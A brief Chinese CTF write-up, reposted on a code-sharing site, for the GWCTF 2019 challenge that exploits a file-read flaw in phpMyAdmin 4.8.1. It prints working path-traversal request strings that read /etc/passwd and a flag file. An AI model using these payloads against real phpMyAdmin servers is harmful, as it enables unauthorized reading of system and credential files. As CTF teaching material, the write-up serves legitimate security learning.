码迷,mamicode.com
首页 > 数据库 > 详细

[GWCTF 2019]我有一个数据库

时间:2020-05-15 00:36:20      阅读:125      评论:0      收藏:0      [点我收藏+]

标签:oss   flag   src   admin   min   一个   cve   ext   type   

知识点

  • phpmyadmin任意文件读取

 

dirb扫描到后台有phpmyadmin目录,访问一下


技术图片

 

版本为4.81,经查询,存在远程文件读取漏洞

直接上payload读取passwd文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

 


技术图片

 

读取成功,尝试读取flag文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

 


技术图片

 

参考
phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpmyadmin 4.8.1 远程文件包含漏洞

[GWCTF 2019]我有一个数据库

标签:oss   flag   src   admin   min   一个   cve   ext   type   

原文地址:https://www.cnblogs.com/mech/p/12892036.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!